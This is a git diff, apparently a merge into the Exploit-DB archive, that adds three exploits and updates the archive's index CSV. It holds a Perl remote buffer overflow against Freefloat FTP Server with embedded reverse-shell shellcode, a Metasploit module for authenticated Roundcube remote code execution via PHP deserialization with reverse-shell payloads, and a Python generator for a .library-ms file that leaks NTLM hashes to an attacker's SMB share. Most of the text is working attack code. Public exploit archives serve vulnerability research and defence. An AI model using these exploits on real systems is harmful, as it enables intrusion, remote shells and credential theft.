Merge remote-tracking branch 'exploitdb/main'

exploits/multiple/remote/52323.txt

@@ -0,0 +1,85 @@
+# Exploit Title: Freefloat FTP Server 1.0 - Remote Buffer Overflow
+# Date: 22 may 2025
+# Notification vendor: No reported
+# Discovery by: Fernando Mengali
+# LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/
+# Version: 1.0
+# Tested on: Windows XP SP3 English - # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3)
+# Vulnerability Type: Remote Buffer Overflow
+# CVE: CVE-2025-5548
+
+#offset: 246
+
+#badchars: \x00\x0a\x0d
+
+#EIP: 0x7C86467B (JMP ESP)
+#Kernel32.dll
+
+use IO::Socket::INET;
+
+# msfvenom -p windows/shell_reverse_tcp lhost=192.168.232.129 lport=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
+# nc -vlp 4444
+# execute exploit
+
+my $buf =
+"\xda\xd4\xbb\x4e\xd9\xfd\x96\xd9\x74\x24\xf4\x58\x2b\xc9" .
+"\xb1\x52\x31\x58\x17\x83\xc0\x04\x03\x16\xca\x1f\x63\x5a" .
+"\x04\x5d\x8c\xa2\xd5\x02\x04\x47\xe4\x02\x72\x0c\x57\xb3" .
+"\xf0\x40\x54\x38\x54\x70\xef\x4c\x71\x77\x58\xfa\xa7\xb6" .
+"\x59\x57\x9b\xd9\xd9\xaa\xc8\x39\xe3\x64\x1d\x38\x24\x98" .
+"\xec\x68\xfd\xd6\x43\x9c\x8a\xa3\x5f\x17\xc0\x22\xd8\xc4" .
+"\x91\x45\xc9\x5b\xa9\x1f\xc9\x5a\x7e\x14\x40\x44\x63\x11" .
+"\x1a\xff\x57\xed\x9d\x29\xa6\x0e\x31\x14\x06\xfd\x4b\x51" .
+"\xa1\x1e\x3e\xab\xd1\xa3\x39\x68\xab\x7f\xcf\x6a\x0b\x0b" .
+"\x77\x56\xad\xd8\xee\x1d\xa1\x95\x65\x79\xa6\x28\xa9\xf2" .
+"\xd2\xa1\x4c\xd4\x52\xf1\x6a\xf0\x3f\xa1\x13\xa1\xe5\x04" .
+"\x2b\xb1\x45\xf8\x89\xba\x68\xed\xa3\xe1\xe4\xc2\x89\x19" .
+"\xf5\x4c\x99\x6a\xc7\xd3\x31\xe4\x6b\x9b\x9f\xf3\x8c\xb6" .
+"\x58\x6b\x73\x39\x99\xa2\xb0\x6d\xc9\xdc\x11\x0e\x82\x1c" .
+"\x9d\xdb\x05\x4c\x31\xb4\xe5\x3c\xf1\x64\x8e\x56\xfe\x5b" .
+"\xae\x59\xd4\xf3\x45\xa0\xbf\x3b\x31\x42\xbe\xd4\x40\x92" .
+"\xd0\x78\xcc\x74\xb8\x90\x98\x2f\x55\x08\x81\xbb\xc4\xd5" .
+"\x1f\xc6\xc7\x5e\xac\x37\x89\x96\xd9\x2b\x7e\x57\x94\x11" .
+"\x29\x68\x02\x3d\xb5\xfb\xc9\xbd\xb0\xe7\x45\xea\x95\xd6" .
+"\x9f\x7e\x08\x40\x36\x9c\xd1\x14\x71\x24\x0e\xe5\x7c\xa5" .
+"\xc3\x51\x5b\xb5\x1d\x59\xe7\xe1\xf1\x0c\xb1\x5f\xb4\xe6" .
+"\x73\x09\x6e\x54\xda\xdd\xf7\x84\x1f\xd2\x90\x6e\x70\xeb" .
+"\x82\x52\x75\x11\x7b\x02\x0c\x9f\x7b\x6c\x48\x37\x2a\x59" .
+"\x07\x94\x51\xcc\xde\xc5\x30\x84\x22\x97\x58\x0e\x12\x72" .
+"\x5a\x1a\x4b\x9a\x5a\x7c\x4e\x04\x2e\x14\x48\xbc\x67\x9b" .
+"\x9d\x6c\xa9\x79\x0f\x4f\x08\xbd\x2e\xec\xaa\x45\x64\x09" .
+"\xe2\x98\x56\x62\xde\x65\xf2\x48\x4e\xec\x79\x1b\x4c\x9d" .
+"\xa5\xda\x47\xd3\xa5\x53\xa3\xaa\x52\x11\x25\xdb\x6a\x62" .
+"\xc3\x5a\x3a\x90\xab\x70\x4e\x74\x4a\x12\xae\x53\x54\xda" .
+"\x38\x90\x70\x58\x98\xac\x2b\xdb\x7c\x48\x5f\x1e\x4a\x4a" .
+"\x1e\x84\x28";
+
+my $offset = 246; # Será substituído depois
+my $eip = pack('V', 0x7c86467b); # Endereço JMP ESP little endian
+my $nop = "\x90" x 20;
+
+my $padding = "A" x $offset;
+my $payload = $padding . $eip . $nop . $buf;
+
+my $socket = IO::Socket::INET->new(
+    PeerAddr => '192.168.232.135',
+    PeerPort => '21',
+    Proto    => 'tcp'
+) or die "Failed to connect: $!\n";
+
+print "Connected to FTP server\n";
+
+my $response = "";
+$response = <$socket>; # banner inicial do FTP
+
+print $socket "USER anonymous\r\n";
+$response = <$socket>;
+print $socket "PASS anonymous\r\n";
+$response = <$socket>;
+
+print $socket "NOOP $payload\r\n";
+$response = <$socket>;
+
+print "Payload sent, check your listener.\n";
+
+close $socket;

exploits/multiple/webapps/52324.NA

@@ -0,0 +1,238 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization',
+        'Description' => %q{
+          Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution
+          by authenticated users because the _from parameter in a URL is not validated
+          in program/actions/settings/upload.php, leading to PHP Object Deserialization.
+
+          An attacker can execute arbitrary system commands as the web server.
+        },
+        'Author' => [
+          'Maksim Rogov', # msf module
+          'Kirill Firsov', # disclosure and original exploit
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-49113'],
+          ['URL', 'https://fearsoff.org/research/roundcube']
+        ],
+        'DisclosureDate' => '2025-06-02',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Platform' => ['unix', 'linux'],
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Linux Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => [ARCH_CMD],
+              'Type' => :nix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0
+      )
+      )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'Email User to login with', '' ]),
+        OptString.new('PASSWORD', [true, 'Password to login with', '' ]),
+        OptString.new('TARGETURI', [true, 'The URI of the Roundcube Application', '/' ]),
+        OptString.new('HOST', [false, 'The hostname of Roundcube server', ''])
+      ]
+    )
+  end
+
+  class PhpPayloadBuilder
+    def initialize(command)
+      @encoded = Rex::Text.encode_base32(command)
+      @gpgconf = %(echo "#{@encoded}"|base32 -d|sh &#)
+    end
+
+    def build
+      len = @gpgconf.bytesize
+      %(|O:16:"Crypt_GPG_Engine":3:{s:8:"_process";b:0;s:8:"_gpgconf";s:#{len}:"#{@gpgconf}";s:8:"_homedir";s:0:"";};)
+    end
+  end
+
+  def fetch_login_page
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'vars_get' => { '_task' => 'login' }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200
+    res
+  end
+
+  def check
+    res = fetch_login_page
+
+    unless res.body =~ /"rcversion"\s*:\s*(\d+)/
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract version number")
+    end
+
+    version = Rex::Version.new(Regexp.last_match(1).to_s)
+    print_good("Extracted version: #{version}")
+
+    if version.between?(Rex::Version.new(10100), Rex::Version.new(10509))
+      return CheckCode::Appears
+    elsif version.between?(Rex::Version.new(10600), Rex::Version.new(10610))
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def build_serialized_payload
+    print_status('Preparing payload...')
+
+    stager = case target['Type']
+             when :nix_cmd
+               payload.encoded
+             when :linux_dropper
+               generate_cmdstager.join(';')
+             else
+               fail_with(Failure::BadConfig, 'Unsupported target type')
+             end
+
+    serialized = PhpPayloadBuilder.new(stager).build.gsub('"', '\\"')
+    print_good('Payload successfully generated and serialized.')
+    serialized
+  end
+
+  def exploit
+    token = fetch_csrf_token
+    login(token)
+
+    payload_serialized = build_serialized_payload
+    upload_payload(payload_serialized)
+  end
+
+  def fetch_csrf_token
+    print_status('Fetching CSRF token...')
+
+    res = fetch_login_page
+    html = res.get_html_document
+
+    token_input = html.at('input[name="_token"]')
+    unless token_input
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract CSRF token")
+    end
+
+    token = token_input.attributes.fetch('value', nil)
+    if token.blank?
+      fail_with(Failure::UnexpectedReply, "#{peer} - CSRF token is empty")
+    end
+
+    print_good("Extracted token: #{token}")
+    token
+  end
+
+  def login(token)
+    print_status('Attempting login...')
+    vars_post = {
+      '_token' => token,
+      '_task' => 'login',
+      '_action' => 'login',
+      '_url' => '_task=login',
+      '_user' => datastore['USERNAME'],
+      '_pass' => datastore['PASSWORD']
+    }
+
+    vars_post['_host'] = datastore['HOST'] if datastore['HOST']
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => vars_post,
+      'vars_get' => { '_task' => 'login' }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - No response during login") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Login failed (code #{res.code})") unless res.code == 302
+
+    print_good('Login successful.')
+  end
+
+  def generate_from
+    options = [
+      'compose',
+      'reply',
+      'import',
+      'settings',
+      'folders',
+      'identity'
+    ]
+    options.sample
+  end
+
+  def generate_id
+    random_data = SecureRandom.random_bytes(8)
+    timestamp = Time.now.to_f.to_s
+    Digest::MD5.hexdigest(random_data + timestamp)
+  end
+
+  def generate_uploadid
+    millis = (Time.now.to_f * 1000).to_i
+    "upload#{millis}"
+  end
+
+  def upload_payload(payload_filename)
+    print_status('Uploading malicious payload...')
+
+    # 1x1 transparent pixel image
+    png_data = Rex::Text.decode_base64('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==')
+    boundary = Rex::Text.rand_text_alphanumeric(8)
+
+    data = ''
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"_file[]\"; filename=\"#{payload_filename}\"\r\n"
+    data << "Content-Type: image/png\r\n\r\n"
+    data << png_data
+    data << "\r\n--#{boundary}--\r\n"
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "?_task=settings&_remote=1&_from=edit-!#{generate_from}&_id=#{generate_id}&_uploadid=#{generate_uploadid}&_action=upload"),
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => data
+    })
+
+    print_good('Exploit attempt complete. Check for session.')
+  end
+end

exploits/windows/remote/52325.py

@@ -0,0 +1,34 @@
+import os
+import tarfile
+
+def main():
+    file_name = input("Enter your file name: ")
+    ip_address = input("Enter IP (EX: 192.168.1.162): ")
+
+    library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
+<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
+  <searchConnectorDescriptionList>
+    <searchConnectorDescription>
+      <simpleLocation>
+        <url>\\\\{ip_address}\\IT</url>
+      </simpleLocation>
+    </searchConnectorDescription>
+  </searchConnectorDescriptionList>
+</libraryDescription>
+"""
+
+    library_file_name = f"{file_name}.library-ms"
+    with open(library_file_name, "w", encoding="utf-8") as f:
+        f.write(library_content)
+
+    tar_name = "exploit.tar"
+    with tarfile.open(tar_name, "w") as tarf:
+        tarf.add(library_file_name)
+
+    if os.path.exists(library_file_name):
+        os.remove(library_file_name)
+
+    print("completed")
+
+if __name__ == "__main__":
+    main()

files_exploits.csv

@@ -10942,6 +10942,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info
 39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info
 52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,,
+52323,exploits/multiple/remote/52323.txt,"Freefloat FTP Server 1.0 - Remote Buffer Overflow",2025-06-13,"Fernando Mengali",remote,multiple,,2025-06-13,2025-06-13,0,CVE-2025-5548,,,,,
 23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info
 29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info
 47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb
@@ -12341,6 +12342,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 52081,exploits/multiple/webapps/52081.txt,"reNgine 2.2.0 - Command Injection (Authenticated)",2024-10-01,"Caner Tercan",webapps,multiple,,2024-10-01,2024-10-01,0,,,,,,
 18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip,
+52324,exploits/multiple/webapps/52324.NA,"Roundcube 1.6.10 - Remote Code Execution (RCE)",2025-06-13,"Maksim Rogov",webapps,multiple,,2025-06-13,2025-06-13,0,CVE-2025-49113,,,,,
 52127,exploits/multiple/webapps/52127.py,"Royal Elementor Addons and Templates 1.3.78 - Unauthenticated Arbitrary File Upload",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2023-5360,,,,,
 11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-43844;CVE-2008-1470,,,,,
 48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,,2020-07-06,2020-07-06,0,CVE-2019-3759,,,,,
@@ -14236,7 +14238,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
 5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
 48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
-52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-37732,,,,,
+52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-06-13,0,CVE-2024-37732,,,,,
 37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
 26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
 27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
@@ -45191,7 +45193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows,,2016-11-02,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-02-at-135629.png,http://www.exploit-db.comPCMan.7z,
 38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21,2015-09-28,2015-09-28,0,CVE-2015-7601;OSVDB-128191,,,,http://www.exploit-db.comPCMan.7z,
 27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21,2013-07-22,2013-07-22,1,OSVDB-94624;CVE-2013-4730,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z,
-26471,exploits/windows/remote/26471.py,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2013-06-29,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
+26471,exploits/windows/remote/26471.NA,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2025-06-13,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows,,2013-08-02,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-08-at-34942-pm.png,http://www.exploit-db.comPCMan.7z,
@@ -45956,6 +45958,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
+52325,exploits/windows/remote/52325.py,"Windows File Explorer Windows 10 Pro x64 - TAR Extraction",2025-06-13,"Daniel Miranda",remote,windows,,2025-06-13,2025-06-13,0,CVE-2025-24071,,,,,
 52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,